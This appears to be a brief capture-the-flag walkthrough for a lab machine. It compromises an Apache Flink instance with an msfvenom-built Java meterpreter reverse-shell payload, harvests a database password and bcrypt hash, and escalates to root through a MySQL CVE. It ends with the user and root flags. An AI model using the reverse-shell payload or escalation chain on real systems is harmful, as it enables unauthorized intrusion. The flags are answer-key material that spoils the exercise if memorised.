# level Nmap scan this fucker - Apache Flink is running, wtf is that. https://www.programmersought.com/article/61642345758/ Looks like we can upload some java. Make a meterpreter ``` msfvenom --platform java -f jar -p java/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 -o payload.jar ``` upload it to the job manager, make sure you have a handler running http://10.129.172.102:8081/#/submit Boom, shell as www-data flag is in /home/albert/user.txt readable /var/www/albert /etc/bash.rc Hash from MySQL Users Table $2y$10$zPLflFwQsMM6AMn44oQyl.uJgZhcAQcA5I6X/Cj9mKse1OBPu9aZy Type is bcrypt (3200 hashcat) :( linpeas.sh finds some interesting passwords: /var/www/html/.env:DB_CONNECTION=mysql /var/www/html/.env:DB_DATABASE=hcms /var/www/html/.env:DB_HOST=127.0.0.1 /var/www/html/.env:DB_USERNAME=hcms cat /var/www/html/.env DB_HOST=127.0.0.1 DB_CONNECTION=mysql DB_USERNAME=hcms DB_PASSWORD=N>2sM4^R_j>g)cfe DB_DATABASE=hcms HCMS_ADMIN_PREFIX=admin port 3306 mysql is configured to listen on, but its not actually Use the following cve to build a metrepreter and have mysqld run that, which will drop you into a root shell. Flag for user is in /home/albert/user.txt and root flag is /root/root.txt https://github.com/Al1ex/CVE-2021-27928/tree/bb49c01063eee7ee276d4113af703b24ff650617 user: HTB{0utd4t3d_cms_1s_n0_g00d} root: HTB{br0k3n_st0r4g3}